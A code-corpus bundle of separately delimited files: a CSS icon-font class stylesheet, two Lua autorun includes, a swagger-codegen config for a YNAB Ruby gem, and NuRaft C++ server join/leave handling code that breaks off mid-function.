.icon-basic-elaboration-cloud-upload:before {
content: "\e079";
}
.icon-basic-elaboration-document-check:before {
content: "\e07a";
}
.icon-basic-elaboration-document-graph:before {
content: "\e07b";
}
.icon-basic-elaboration-folder-check:before {
content: "\e07c";
}
.icon-basic-elaboration-folder-cloud:before {
content: "\e07d";
}
.icon-basic-elaboration-mail-document:before {
content: "\e07e";
}
.icon-basic-elaboration-mail-download:before {
content: "\e07f";
}
.icon-basic-elaboration-message-check:before {
content: "\e080";
}
.icon-basic-elaboration-message-dots:before {
content: "\e081";
}
.icon-basic-elaboration-message-happy:before {
content: "\e082";
}
.icon-basic-elaboration-tablet-pencil:before {
content: "\e083";
}
.icon-basic-elaboration-todolist-2:before {
content: "\e084";
}
.icon-basic-elaboration-todolist-check:before {
content: "\e085";
}
.icon-basic-elaboration-todolist-cloud:before {
content: "\e086";
}
.icon-basic-elaboration-todolist-download:before {
content: "\e087";
}
.icon-basic-accelerator:before {
content: "\e088";
}
.icon-basic-anticlockwise:before {
content: "\e089";
}
.icon-basic-battery-half:before {
content: "\e08a";
}
.icon-basic-bolt:before {
content: "\e08b";
}
.icon-basic-book:before {
content: "\e08c";
}
.icon-basic-book-pencil:before {
content: "\e08d";
}
.icon-basic-bookmark:before {
content: "\e08e";
}
.icon-basic-calendar:before {
content: "\e08f";
}
.icon-basic-cards-hearts:before {
content: "\e090";
}
.icon-basic-case:before {
content: "\e091";
}
.icon-basic-clessidre:before {
content: "\e092";
}
.icon-basic-cloud:before {
content: "\e093";
}
.icon-basic-clubs:before {
content: "\e094";
}
.icon-basic-compass:before {
content: "\e095";
}
.icon-basic-cup:before {
content: "\e096";
}
.icon-basic-display:before {
content: "\e097";
}
.icon-basic-download:before {
content: "\e098";
}
.icon-basic-exclamation:before {
content: "\e099";
}
.icon-basic-eye:before {
content: "\e09a";
}
.icon-basic-gear:before {
content: "\e09b";
}
.icon-basic-geolocalize-01:before {
content: "\e09c";
}
.icon-basic-geolocalize-05:before {
content: "\e09d";
}
.icon-basic-headset:before {
content: "\e09e";
}
.icon-basic-heart:before {
content: "\e09f";
}
.icon-basic-home:before {
content: "\e0a0";
}
.icon-basic-laptop:before {
content: "\e0a1";
}
.icon-basic-lightbulb:before {
content: "\e0a2";
}
.icon-basic-link:before {
content: "\e0a3";
}
.icon-basic-lock:before {
content: "\e0a4";
}
.icon-basic-lock-open:before {
content: "\e0a5";
}
.icon-basic-magnifier:before {
content: "\e0a6";
}
.icon-basic-magnifier-minus:before {
content: "\e0a7";
}
.icon-basic-magnifier-plus:before {
content: "\e0a8";
}
.icon-basic-mail:before {
content: "\e0a9";
}
.icon-basic-mail-multiple:before {
content: "\e0aa";
}
.icon-basic-mail-open-text:before {
content: "\e0ab";
}
.icon-basic-male:before {
content: "\e0ac";
}
.icon-basic-map:before {
content: "\e0ad";
}
.icon-basic-message:before {
content: "\e0ae";
}
.icon-basic-message-multiple:before {
content: "\e0af";
}
.icon-basic-message-txt:before {
content: "\e0b0";
}
.icon-basic-mixer2:before {
content: "\e0b1";
}
.icon-basic-notebook-pencil:before {
content: "\e0b2";
}
.icon-basic-paperplane:before {
content: "\e0b3";
}
.icon-basic-photo:before {
content: "\e0b4";
}
.icon-basic-picture:before {
content: "\e0b5";
}
.icon-basic-picture-multiple:before {
content: "\e0b6";
}
.icon-basic-rss:before {
content: "\e0b7";
}
.icon-basic-server2:before {
content: "\e0b8";
}
.icon-basic-settings:before {
content: "\e0b9";
}
.icon-basic-share:before {
content: "\e0ba";
}
.icon-basic-sheet-multiple:before {
content: "\e0bb";
}
.icon-basic-sheet-pencil:before {
content: "\e0bc";
}
.icon-basic-sheet-txt:before {
content: "\e0bd";
}
.icon-basic-tablet:before {
content: "\e0be";
}
.icon-basic-todo:before {
content: "\e0bf";
}
.icon-basic-webpage:before {
content: "\e0c0";
}
.icon-basic-webpage-img-txt:before {
content: "\e0c1";
}
.icon-basic-webpage-multiple:before {
content: "\e0c2";
}
.icon-basic-webpage-txt:before {
content: "\e0c3";
}
.icon-basic-world:before {
content: "\e0c4";
}
.icon-arrows-check:before {
content: "\e0c5";
}
.icon-arrows-circle-check:before {
content: "\e0c6";
}
.icon-arrows-circle-down:before {
content: "\e0c7";
}
.icon-arrows-circle-downleft:before {
content: "\e0c8";
}
.icon-arrows-circle-downright:before {
content: "\e0c9";
}
.icon-arrows-circle-left:before {
content: "\e0ca";
}
.icon-arrows-circle-minus:before {
content: "\e0cb";
}
.icon-arrows-circle-plus:before {
content: "\e0cc";
}
.icon-arrows-circle-remove:before {
content: "\e0cd";
}
.icon-arrows-circle-right:before {
content: "\e0ce";
}
.icon-arrows-circle-up:before {
content: "\e0cf";
}
.icon-arrows-circle-upleft:before {
content: "\e0d0";
}
.icon-arrows-circle-upright:before {
content: "\e0d1";
}
.icon-arrows-clockwise:before {
content: "\e0d2";
}
.icon-arrows-clockwise-dashed:before {
content: "\e0d3";
}
.icon-arrows-down:before {
content: "\e0d4";
}
.icon-arrows-down-double-34:before {
content: "\e0d5";
}
.icon-arrows-downleft:before {
content: "\e0d6";
}
.icon-arrows-downright:before {
content: "\e0d7";
}
.icon-arrows-expand:before {
content: "\e0d8";
}
.icon-arrows-glide:before {
content: "\e0d9";
}
.icon-arrows-glide-horizontal:before {
content: "\e0da";
}
.icon-arrows-glide-vertical:before {
content: "\e0db";
}
.icon-arrows-keyboard-alt:before {
content: "\e0dc";
}
.icon-arrows-keyboard-cmd-29:before {
content: "\e0dd";
}
.icon-arrows-left:before {
content: "\e0de";
}
.icon-arrows-left-double-32:before {
content: "\e0df";
}
.icon-arrows-move2:before {
content: "\e0e0";
}
.icon-arrows-remove:before {
content: "\e0e1";
}
.icon-arrows-right:before {
content: "\e0e2";
}
.icon-arrows-right-double-31:before {
content: "\e0e3";
}
.icon-arrows-rotate:before {
content: "\e0e4";
}
.icon-arrows-plus:before {
content: "\e0e5";
}
.icon-arrows-shrink:before {
content: "\e0e6";
}
.icon-arrows-slim-left:before {
content: "\e0e7";
}
.icon-arrows-slim-left-dashed:before {
content: "\e0e8";
}
.icon-arrows-slim-right:before {
content: "\e0e9";
}
.icon-arrows-slim-right-dashed:before {
content: "\e0ea";
}
.icon-arrows-squares:before {
content: "\e0eb";
}
.icon-arrows-up:before {
content: "\e0ec";
}
.icon-arrows-up-double-33:before {
content: "\e0ed";
}
.icon-arrows-upleft:before {
content: "\e0ee";
}
.icon-arrows-upright:before {
content: "\e0ef";
}
.icon-browser-streamline-window:before {
content: "\e0f0";
}
.icon-bubble-comment-streamline-talk:before {
content: "\e0f1";
}
.icon-caddie-shopping-streamline:before {
content: "\e0f2";
}
.icon-computer-imac:before {
content: "\e0f3";
}
.icon-edit-modify-streamline:before {
content: "\e0f4";
}
.icon-home-house-streamline:before {
content: "\e0f5";
}
.icon-locker-streamline-unlock:before {
content: "\e0f6";
}
.icon-lock-locker-streamline:before {
content: "\e0f7";
}
.icon-link-streamline:before {
content: "\e0f8";
}
.icon-man-people-streamline-user:before {
content: "\e0f9";
}
.icon-speech-streamline-talk-user:before {
content: "\e0fa";
}
.icon-settings-streamline-2:before {
content: "\e0fb";
}
.icon-settings-streamline-1:before {
content: "\e0fc";
}
.icon-arrow-carrot-left:before {
content: "\e0fd";
}
.icon-arrow-carrot-right:before {
content: "\e0fe";
}
.icon-arrow-carrot-up:before {
content: "\e0ff";
}
.icon-arrow-carrot-right-alt2:before {
content: "\e100";
}
.icon-arrow-carrot-down-alt2:before {
content: "\e101";
}
.icon-arrow-carrot-left-alt2:before {
content: "\e102";
}
.icon-arrow-carrot-up-alt2:before {
content: "\e103";
}
.icon-arrow-carrot-2up:before {
content: "\e104";
}
.icon-arrow-carrot-2right-alt2:before {
content: "\e105";
}
.icon-arrow-carrot-2up-alt2:before {
content: "\e106";
}
.icon-arrow-carrot-2right:before {
content: "\e107";
}
.icon-arrow-carrot-2left-alt2:before {
content: "\e108";
}
.icon-arrow-carrot-2left:before {
content: "\e109";
}
.icon-arrow-carrot-2down-alt2:before {
content: "\e10a";
}
.icon-arrow-carrot-2down:before {
content: "\e10b";
}
.icon-arrow-carrot-down:before {
content: "\e10c";
}
.icon-arrow-left:before {
content: "\e10d";
}
.icon-arrow-right:before {
content: "\e10e";
}
.icon-arrow-triangle-down:before {
content: "\e10f";
}
.icon-arrow-triangle-left:before {
content: "\e110";
}
.icon-arrow-triangle-right:before {
content: "\e111";
}
.icon-arrow-triangle-up:before {
content: "\e112";
}
.icon-adjust-vert:before {
content: "\e113";
}
.icon-bag-alt:before {
content: "\e114";
}
.icon-box-checked:before {
content: "\e115";
}
.icon-camera-alt:before {
content: "\e116";
}
.icon-check:before {
content: "\e117";
}
.icon-chat-alt:before {
content: "\e118";
}
.icon-cart-alt:before {
content: "\e119";
}
.icon-check-alt2:before {
content: "\e11a";
}
.icon-circle-empty:before {
content: "\e11b";
}
.icon-circle-slelected:before {
content: "\e11c";
}
.icon-clock-alt:before {
content: "\e11d";
}
.icon-close-alt2:before {
content: "\e11e";
}
.icon-cloud-download-alt:before {
content: "\e11f";
}
.icon-cloud-upload-alt:before {
content: "\e120";
}
.icon-compass-alt:before {
content: "\e121";
}
.icon-creditcard:before {
content: "\e122";
}
.icon-datareport:before {
content: "\e123";
}
.icon-easel:before {
content: "\e124";
}
.icon-lightbulb-alt:before {
content: "\e125";
}
.icon-laptop:before {
content: "\e126";
}
.icon-lock-alt:before {
content: "\e127";
}
.icon-lock-open-alt:before {
content: "\e128";
}
.icon-link:before {
content: "\e129";
}
.icon-link-alt:before {
content: "\e12a";
}
.icon-map-alt:before {
content: "\e12b";
}
.icon-mail-alt:before {
content: "\e12c";
}
.icon-piechart:before {
content: "\e12d";
}
.icon-star-half:before {
content: "\e12e";
}
.icon-star-half-alt:before {
content: "\e12f";
}
.icon-star-alt:before {
content: "\e130";
}
.icon-ribbon-alt:before {
content: "\e131";
}
.icon-tools:before {
content: "\e132";
}
.icon-paperclip:before {
content: "\e133";
}
.icon-adjust-horiz:before {
content: "\e134";
}
.icon-social-blogger:before {
content: "\e135";
}
.icon-social-blogger-circle:before {
content: "\e136";
}
.icon-social-blogger-square:before {
content: "\e137";
}
.icon-social-delicious:before {
content: "\e138";
}
.icon-social-delicious-circle:before {
content: "\e139";
}
.icon-social-delicious-square:before {
content: "\e13a";
}
.icon-social-deviantart:before {
content: "\e13b";
}
.icon-social-deviantart-circle:before {
content: "\e13c";
}
.icon-social-deviantart-square:before {
content: "\e13d";
}
.icon-social-dribbble:before {
content: "\e13e";
}
.icon-social-dribbble-circle:before {
content: "\e13f";
}
.icon-social-dribbble-square:before {
content: "\e140";
}
.icon-social-facebook:before {
content: "\e141";
}
.icon-social-facebook-circle:before {
content: "\e142";
}
.icon-social-facebook-square:before {
content: "\e143";
}
.icon-social-flickr:before {
content: "\e144";
}
.icon-social-flickr-circle:before {
content: "\e145";
}
.icon-social-flickr-square:before {
content: "\e146";
}
.icon-social-googledrive:before {
content: "\e147";
}
.icon-social-googledrive-alt2:before {
content: "\e148";
}
.icon-social-googledrive-square:before {
content: "\e149";
}
.icon-social-googleplus:before {
content: "\e14a";
}
.icon-social-googleplus-circle:before {
content: "\e14b";
}
.icon-social-googleplus-square:before {
content: "\e14c";
}
.icon-social-instagram:before {
content: "\e14d";
}
.icon-social-instagram-circle:before {
content: "\e14e";
}
.icon-social-instagram-square:before {
content: "\e14f";
}
.icon-social-linkedin:before {
content: "\e150";
}
.icon-social-linkedin-circle:before {
content: "\e151";
}
.icon-social-linkedin-square:before {
content: "\e152";
}
.icon-social-myspace:before {
content: "\e153";
}
.icon-social-myspace-circle:before {
content: "\e154";
}
.icon-social-myspace-square:before {
content: "\e155";
}
.icon-social-picassa:before {
content: "\e156";
}
.icon-social-picassa-circle:before {
content: "\e157";
}
.icon-social-picassa-square:before {
content: "\e158";
}
.icon-social-pinterest:before {
content: "\e159";
}
.icon-social-pinterest-circle:before {
content: "\e15a";
}
.icon-social-pinterest-square:before {
content: "\e15b";
}
.icon-social-rss:before {
content: "\e15c";
}
.icon-social-rss-circle:before {
content: "\e15d";
}
.icon-social-rss-square:before {
content: "\e15e";
}
.icon-social-share:before {
content: "\e15f";
}
.icon-social-share-circle:before {
content: "\e160";
}
.icon-social-share-square:before {
content: "\e161";
}
.icon-social-skype:before {
content: "\e162";
}
.icon-social-skype-circle:before {
content: "\e163";
}
.icon-social-skype-square:before {
content: "\e164";
}
.icon-social-spotify:before {
content: "\e165";
}
.icon-social-spotify-circle:before {
content: "\e166";
}
.icon-social-spotify-square:before {
content: "\e167";
}
.icon-social-stumbleupon-circle:before {
content: "\e168";
}
.icon-social-stumbleupon-square:before {
content: "\e169";
}
.icon-social-tumbleupon:before {
content: "\e16a";
}
.icon-social-tumblr:before {
content: "\e16b";
}
.icon-social-tumblr-circle:before {
content: "\e16c";
}
.icon-social-tumblr-square:before {
content: "\e16d";
}
.icon-social-twitter:before {
content: "\e16e";
}
.icon-social-twitter-circle:before {
content: "\e16f";
}
.icon-social-twitter-square:before {
content: "\e170";
}
.icon-social-vimeo:before {
content: "\e171";
}
.icon-social-vimeo-circle:before {
content: "\e172";
}
.icon-social-vimeo-square:before {
content: "\e173";
}
.icon-social-wordpress:before {
content: "\e174";
}
.icon-social-wordpress-circle:before {
content: "\e175";
}
.icon-social-wordpress-square:before {
content: "\e176";
}
.icon-social-youtube:before {
content: "\e177";
}
.icon-social-youtube-circle:before {
content: "\e178";
}
.icon-social-youtube-square:before {
content: "\e179";
}
.icon-aim:before {
content: "\e17a";
}
.icon-aim-alt:before {
content: "\e17b";
}
.icon-amazon:before {
content: "\e17c";
}
.icon-app-store:before {
content: "\e17d";
}
.icon-apple:before {
content: "\e17e";
}
.icon-behance:before {
content: "\e17f";
}
.icon-creative-commons:before {
content: "\e180";
}
.icon-dropbox:before {
content: "\e181";
}
.icon-digg:before {
content: "\e182";
}
.icon-last:before {
content: "\e183";
}
.icon-paypal:before {
content: "\e184";
}
.icon-rss:before {
content: "\e185";
}
.icon-sharethis:before {
content: "\e186";
}
.icon-skype:before {
content: "\e187";
}
.icon-squarespace:before {
content: "\e188";
}
.icon-technorati:before {
content: "\e189";
}
.icon-whatsapp:before {
content: "\e18a";
}
.icon-windows:before {
content: "\e18b";
}
.icon-reddit:before {
content: "\e18c";
}
.icon-foursquare:before {
content: "\e18d";
}
.icon-soundcloud:before {
content: "\e18e";
}
.icon-w3:before {
content: "\e18f";
}
.icon-wikipedia:before {
content: "\e190";
}
.icon-grid-2x2:before {
content: "\e191";
}
.icon-grid-3x3:before {
content: "\e192";
}
.icon-menu-square-alt:before {
content: "\e193";
}
.icon-menu:before {
content: "\e194";
}
.icon-cloud-alt:before {
content: "\e195";
}
.icon-tags-alt:before {
content: "\e196";
}
.icon-tag-alt:before {
content: "\e197";
}
.icon-gift-alt:before {
content: "\e198";
}
.icon-comment-alt:before {
content: "\e199";
}
.icon-icon-phone:before {
content: "\e19a";
}
.icon-icon-mobile:before {
content: "\e19b";
}
.icon-icon-house-alt:before {
content: "\e19c";
}
.icon-icon-house:before {
content: "\e19d";
}
.icon-icon-desktop:before {
content: "\e19e";
}
| Groundswell/swell_theme_stamp |
<|start_filename|>lua/autorun/client/autorun.lua<|end_filename|>
WUMA = WUMA or {}
include("wuma/client/init.lua")
<|start_filename|>lua/autorun/server/autorun.lua<|end_filename|>
WUMA = WUMA or {}
include("wuma/init.lua")
| Kill-Zone/wuma |
<|start_filename|>.swagger-codegen/config.json<|end_filename|>
{
"gemName": "ynab",
"moduleName": "YNAB",
"gemDescription": "Ruby gem wrapper for the YNAB API. Read the documentation at https://api.youneedabudget.com",
"gemHomepage": "https://github.com/ynab/ynab-sdk-ruby",
"gemLicense": "Apache-2.0",
"gemAuthor": "You <NAME> Budget, LLC",
"gemAuthorEmail": "<EMAIL>"
}
| ahey/ynab-sdk-ruby |
<|start_filename|>src/handle_join_leave.cxx<|end_filename|>
/************************************************************************
Modifications Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Original Copyright:
See URL: https://github.com/datatechnology/cornerstone
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#include "raft_server.hxx"
#include "cluster_config.hxx"
#include "event_awaiter.h"
#include "peer.hxx"
#include "snapshot_sync_ctx.hxx"
#include "state_machine.hxx"
#include "state_mgr.hxx"
#include "tracer.hxx"
#include <cassert>
#include <sstream>
namespace nuraft {
ptr<resp_msg> raft_server::handle_add_srv_req(req_msg& req) {
std::vector< ptr<log_entry> >& entries = req.log_entries();
ptr<resp_msg> resp = cs_new<resp_msg>
( state_->get_term(),
msg_type::add_server_response,
id_,
leader_ );
if ( entries.size() != 1 ||
entries[0]->get_val_type() != log_val_type::cluster_server ) {
p_db( "bad add server request as we are expecting one log entry "
"with value type of ClusterServer" );
resp->set_result_code(cmd_result_code::BAD_REQUEST);
return resp;
}
if (role_ != srv_role::leader || write_paused_) {
p_er("this is not a leader, cannot handle AddServerRequest");
resp->set_result_code(cmd_result_code::NOT_LEADER);
return resp;
}
// Before checking duplicate ID, confirm srv_to_leave_ is gone.
check_srv_to_leave_timeout();
ptr<srv_config> srv_conf =
srv_config::deserialize( entries[0]->get_buf() );
if ( peers_.find( srv_conf->get_id() ) != peers_.end() ||
id_ == srv_conf->get_id() ) {
p_wn( "the server to be added has a duplicated "
"id with existing server %d",
srv_conf->get_id() );
resp->set_result_code(cmd_result_code::SERVER_ALREADY_EXISTS);
return resp;
}
if (config_changing_) {
// the previous config has not committed yet
p_wn("previous config has not committed yet");
resp->set_result_code(cmd_result_code::CONFIG_CHANGING);
return resp;
}
if (srv_to_join_) {
// Adding server is already in progress.
// Check the last active time of that server.
ulong last_active_ms = srv_to_join_->get_active_timer_us() / 1000;
p_wn("previous adding server (%d) is in progress, "
"last activity: %zu ms ago",
srv_to_join_->get_id(),
last_active_ms);
if ( last_active_ms <=
(ulong)raft_server::raft_limits_.response_limit_ *
ctx_->get_params()->heart_beat_interval_ ) {
resp->set_result_code(cmd_result_code::SERVER_IS_JOINING);
return resp;
}
// Otherwise: activity timeout, reset the server.
p_wn("activity timeout (last activity %lu ms ago), start over",
last_active_ms);
reset_srv_to_join();
}
conf_to_add_ = std::move(srv_conf);
timer_task<int32>::executor exec =
(timer_task<int32>::executor)
std::bind( &raft_server::handle_hb_timeout,
this,
std::placeholders::_1 );
srv_to_join_ = cs_new< peer,
ptr<srv_config>&,
context&,
timer_task<int32>::executor&,
ptr<logger>& >
( conf_to_add_, *ctx_, exec, l_ );
invite_srv_to_join_cluster();
resp->accept(log_store_->next_slot());
return resp;
}
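// (Editorial note, not part of the original source.) The add-server flow
// implemented by the functions below is, roughly:
//   1. handle_add_srv_req()         - leader validates the request and sets srv_to_join_.
//   2. invite_srv_to_join_cluster() - leader sends join_cluster_request with the current config.
//   3. handle_join_cluster_req()    - the new server enters catch-up mode and accepts.
//   4. sync_log_to_new_srv()        - leader streams committed logs (or a snapshot) until the
//                                     gap is small enough, then appends a new cluster_config entry.
//   Once that config entry is committed, the new server is a full cluster member.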
void raft_server::invite_srv_to_join_cluster() {
ptr<req_msg> req = cs_new<req_msg>
( state_->get_term(),
msg_type::join_cluster_request,
id_,
srv_to_join_->get_id(),
0L,
log_store_->next_slot() - 1,
quick_commit_index_.load() );
ptr<cluster_config> c_conf = get_config();
req->log_entries().push_back
( cs_new<log_entry>
( state_->get_term(), c_conf->serialize(), log_val_type::conf ) );
srv_to_join_->send_req(srv_to_join_, req, ex_resp_handler_);
p_in("sent join request to peer %d, %s",
srv_to_join_->get_id(),
srv_to_join_->get_endpoint().c_str());
}
ptr<resp_msg> raft_server::handle_join_cluster_req(req_msg& req) {
std::vector<ptr<log_entry>>& entries = req.log_entries();
ptr<resp_msg> resp = cs_new<resp_msg>
( state_->get_term(),
msg_type::join_cluster_response,
id_,
req.get_src() );
if ( entries.size() != 1 ||
entries[0]->get_val_type() != log_val_type::conf ) {
p_in("receive an invalid JoinClusterRequest as the log entry value "
"doesn't meet the requirements");
return resp;
}
// MONSTOR-8244:
// Adding server may be called multiple times while previous process is
// in progress. It should gracefully handle the new request and should
// not ruin the current request.
bool reset_commit_idx = true;
if (catching_up_) {
p_wn("this server is already in log syncing mode, "
"but let's do it again: sm idx %zu, quick commit idx %zu, "
"will not reset commit index",
sm_commit_index_.load(),
quick_commit_index_.load());
reset_commit_idx = false;
}
p_in("got join cluster req from leader %d", req.get_src());
catching_up_ = true;
role_ = srv_role::follower;
leader_ = req.get_src();
cb_func::Param follower_param(id_, leader_);
(void) ctx_->cb_func_.call(cb_func::BecomeFollower, &follower_param);
if (reset_commit_idx) {
// MONSTOR-7503: We should not reset it to 0.
sm_commit_index_.store( initial_commit_index_ );
quick_commit_index_.store( initial_commit_index_ );
}
state_->set_voted_for(-1);
state_->set_term(req.get_term());
ctx_->state_mgr_->save_state(*state_);
ptr<cluster_config> c_config = cluster_config::deserialize(entries[0]->get_buf());
// WARNING: We should make cluster config durable here. Otherwise, if
// this server gets restarted before receiving the first
// committed config (the first config that includes this server),
// this server will remove itself immediately by replaying
// previous config which does not include this server.
ctx_->state_mgr_->save_config(*c_config);
reconfigure(c_config);
resp->accept( quick_commit_index_.load() + 1 );
return resp;
}
void raft_server::handle_join_cluster_resp(resp_msg& resp) {
if (srv_to_join_ && srv_to_join_ == resp.get_peer()) {
if (resp.get_accepted()) {
p_in("new server (%d) confirms it will join, "
"start syncing logs to it", srv_to_join_->get_id());
sync_log_to_new_srv(resp.get_next_idx());
} else {
p_wn("new server (%d) cannot accept the invitation, give up",
srv_to_join_->get_id());
}
} else {
p_wn("no server to join, drop the message");
}
}
void raft_server::sync_log_to_new_srv(ulong start_idx) {
p_db("[SYNC LOG] peer %d start idx %llu, my log start idx %llu\n",
srv_to_join_->get_id(), start_idx, log_store_->start_index());
// only sync committed logs
ulong gap = ( quick_commit_index_ > start_idx )
? ( quick_commit_index_ - start_idx )
: 0;
ptr<raft_params> params = ctx_->get_params();
if ( ( params->log_sync_stop_gap_ > 0 &&
gap < (ulong)params->log_sync_stop_gap_ ) ||
params->log_sync_stop_gap_ == 0 ) {
p_in( "[SYNC LOG] LogSync is done for server %d "
"with log gap %zu (%zu - %zu, limit %d), "
"now put the server into cluster",
srv_to_join_->get_id(),
gap, quick_commit_index_.load(), start_idx,
params->log_sync_stop_gap_ );
ptr<cluster_config> cur_conf = get_config();
// WARNING:
// If there is any uncommitted changed config,
// new config should be generated on top of it.
if (uncommitted_config_) {
p_in("uncommitted config exists at log %zu, prev log %zu",
uncommitted_config_->get_log_idx(),
uncommitted_config_->get_prev_log_idx());
cur_conf = uncommitted_config_;
}
ptr<cluster_config> new_conf = cs_new<cluster_config>
( log_store_->next_slot(),
cur_conf->get_log_idx() );
new_conf->get_servers().insert( new_conf->get_servers().end(),
cur_conf->get_servers().begin(),
cur_conf->get_servers().end() );
new_conf->get_servers().push_back(conf_to_add_);
new_conf->set_user_ctx( cur_conf->get_user_ctx() );
new_conf->set_async_replication
( cur_conf->is_async_replication() );
ptr<buffer> new_conf_buf(new_conf->serialize());
ptr<log_entry> entry( cs_new<log_entry>( state_->get_term(),
new_conf_buf,
log_val_type::conf ) );
store_log_entry(entry);
config_changing_ = true;
uncommitted_config_ = new_conf;
request_append_entries();
return;
}
ptr<req_msg> req;
// Modified by <NAME>, 12/22, 2017.
// When snapshot transmission is still in progress, start_idx can be 0.
// We should tolerate this.
if (/* start_idx > 0 && */ start_idx < log_store_->start_index()) {
srv_to_join_snp_retry_required_ = false;
bool succeeded_out = false;
req = create_sync_snapshot_req( srv_to_join_,
start_idx,
state_->get_term(),
quick_commit_index_,
succeeded_out );
if (!succeeded_out) {
// If reading snapshot fails, enable HB temporarily to retry it.
srv_to_join_snp_retry_required_ = true;
enable_hb_for_peer(*srv_to_join_);
return;
}
} else {
int32 size_to_sync = std::min(gap, (ulong)params->log_sync_batch_size_);
ptr<buffer> log_pack = log_store_->pack(start_idx, size_to_sync);
p_db( "size to sync: %d, log_pack size %zu\n",
size_to_sync, log_pack->size() );
req = cs_new<req_msg>( state_->get_term(),
msg_type::sync_log_request,
id_,
srv_to_join_->get_id(),
0L,
start_idx - 1,
quick_commit_index_.load() );
req->log_entries().push_back
( cs_new<log_entry>
( state_->get_term(), log_pack, log_val_type::log_pack) );
}
if (!params->use_bg_thread_for_snapshot_io_) {
// Synchronous IO: directly send here.
srv_to_join_->send_req(srv_to_join_, req, ex_resp_handler_);
} else {
// Asynchronous IO: invoke the thread.
snapshot_io_mgr::instance().invoke();
}
}
ptr<resp_msg> raft_server::handle_log_sync_req(req_msg& req) {
std::vector<ptr<log_entry>>& entries = req.log_entries();
ptr<resp_msg> resp
( cs_new<resp_msg>
( state_->get_term(), msg_type::sync_log_response, id_,
req.get_src(), log_store_->next_slot() ) );
p_db("entries size %d, type %d, catching_up %s\n",
(int)entries.size(), (int)entries[0]->get_val_type(),
(catching_up_)?"true":"false");
if ( entries.size() != 1 ||
entries[0]->get_val_type() != log_val_type::log_pack ) {
p_wn("receive an invalid LogSyncRequest as the log entry value "
"doesn't meet the requirements: entries size %zu",
entries.size() );
return resp;
}
if (!catching_up_) {
p_wn("This server is ready for cluster, ignore the request, "
"my next log idx %llu", resp->get_next_idx());
return resp;
}
log_store_->apply_pack(req.get_last_log_idx() + 1, entries[0]->get_buf());
p_db("last log %ld\n", log_store_->next_slot() - 1);
precommit_index_ = log_store_->next_slot() - 1;
commit(log_store_->next_slot() - 1);
resp->accept(log_store_->next_slot());
return resp;
}
void raft_server::handle_log_sync_resp(resp_msg& resp) {
if (srv_to_join_) {
p_db("srv_to_join: %d\n", srv_to_join_->get_id());
// we are reusing heartbeat interval value to indicate when to stop retry
srv_to_join_->resume_hb_speed();
srv_to_join_->set_next_log_idx(resp.get_next_idx());
srv_to_join_->set_matched_idx(resp.get_next_idx() - 1);
sync_log_to_new_srv(resp.get_next_idx());
} else {
p_wn("got log sync resp while srv_to_join is null");
}
}
ptr<resp_msg> raft_server::handle_rm_srv_req(req_msg& req) {
std::vector<ptr<log_entry>>& entries = req.log_entries();
ptr<resp_msg> resp = cs_new<resp_msg>
( state_->get_term(),
msg_type::remove_server_response,
id_,
leader_ );
if (entries.size() != 1 || entries[0]->get_buf().size() != sz_int) {
p_wn("bad remove server request as we are expecting "
"one log entry with value type of int");
resp->set_result_code(cmd_result_code::BAD_REQUEST);
return resp;
}
if (role_ != srv_role::leader || write_paused_) {
p_wn("this is not a leader, cannot handle RemoveServerRequest");
resp->set_result_code(cmd_result_code::NOT_LEADER);
return resp;
}
check_srv_to_leave_timeout();
if (srv_to_leave_) {
p_wn("previous to-be-removed server %d has not left yet",
srv_to_leave_->get_id());
resp->set_result_code(cmd_result_code::SERVER_IS_LEAVING);
return resp;
}
// NOTE:
// Although `srv_to_leave_` is not set, we should check if
// there is any peer whose leave flag is set.
for (auto& entry: peers_) {
ptr<peer> pp = entry.second;
if (pp->is_leave_flag_set()) {
p_wn("leave flag of server %d is set, but the server "
"has not left yet",
pp->get_id());
resp->set_result_code(cmd_result_code::SERVER_IS_LEAVING);
return resp;
}
}
if (config_changing_) {
// the previous config has not committed yet
p_wn("previous config has not committed yet");
resp->set_result_code(cmd_result_code::CONFIG_CHANGING);
return resp;
}
int32 srv_id = entries[0]->get_buf().get_int();
if (srv_id == id_) {
p_wn("cannot request to remove leader");
resp->set_result_code(cmd_result_code::CANNOT_REMOVE_LEADER);
return resp;
}
peer_itor pit = peers_.find(srv_id);
if (pit == peers_.end()) {
p_wn("server %d does not exist", srv_id);
resp->set_result_code(cmd_result_code::SERVER_NOT_FOUND);
return resp;
}
ptr<peer> p = pit->second;
ptr<req_msg> leave_req( cs_new<req_msg>
( state_->get_term(),
msg_type::leave_cluster_request,
id_, srv_id, 0,
log_store_->next_slot() - 1,
quick_commit_index_.load() ) );
// WARNING:
// DO NOT reset HB counter to 0 as removing server
// may be requested multiple times, and anyway we should
// remove that server.
p->set_leave_flag();
if (p->make_busy()) {
p->send_req(p, leave_req, ex_resp_handler_);
p_in("sent leave request to peer %d", p->get_id());
} else {
p->set_rsv_msg(leave_req, ex_resp_handler_);
p_in("peer %d is currently busy, keep the message", p->get_id());
}
resp->accept(log_store_->next_slot());
return resp;
}
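// (Editorial note, not part of the original source.) The remove-server flow
// mirrors the add-server flow above:
//   1. handle_rm_srv_req()         - leader validates the request and sends leave_cluster_request.
//   2. handle_leave_cluster_req()  - the target server sets steps_to_down_ and accepts.
//   3. handle_leave_cluster_resp() - on acceptance the leader calls rm_srv_from_cluster(),
//                                    which appends a cluster_config entry without that server.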
ptr<resp_msg> raft_server::handle_leave_cluster_req(req_msg& req) {
ptr<resp_msg> resp
( cs_new<resp_msg>( state_->get_term(),
msg_type::leave_cluster_response,
id_,
req.get_src() ) );
if (!config_changing_) {
p_db("leave cluster, set steps to down to 2");
steps_to_down_ = 2;
resp->accept(log_store_->next_slot());
}
return resp;
}
void raft_server::handle_leave_cluster_resp(resp_msg& resp) {
if (!resp.get_accepted()) {
p_db("peer doesn't accept to stepping down, stop proceeding");
return;
}
p_db("peer accepted to stepping down, removing this server from cluster");
rm_srv_from_cluster(resp.get_src());
}
void raft_server::rm_srv_from_cluster(int32 srv_id) {
if (srv_to_leave_) {
p_wn("to-be-removed server %d already exists, "
"cannot remove server %d for now",
srv_to_leave_->get_id(), srv_id);
return;
}
ptr<cluster_config> cur_conf = get_config();
// NOTE: Need to honor uncommitted config,
